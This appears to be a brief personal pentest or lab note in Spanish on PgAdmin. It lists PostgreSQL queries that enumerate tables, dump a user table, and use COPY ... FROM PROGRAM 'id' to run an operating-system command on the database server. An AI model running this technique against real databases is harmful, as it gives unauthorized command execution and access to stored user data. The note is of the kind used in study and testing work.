PgAdmin

Para ejecutar comandos sobre una db

Pasted image 20260619120554.png

SELECT table_schema, table_name 
FROM information_schema.tables 
WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
ORDER BY table_schema, table_name;
SELECT * FROM user LIMIT 50;
DROP TABLE IF EXISTS rce_out;
CREATE TABLE rce_out (resultado text);
COPY rce_out FROM PROGRAM 'id';
SELECT * FROM rce_out;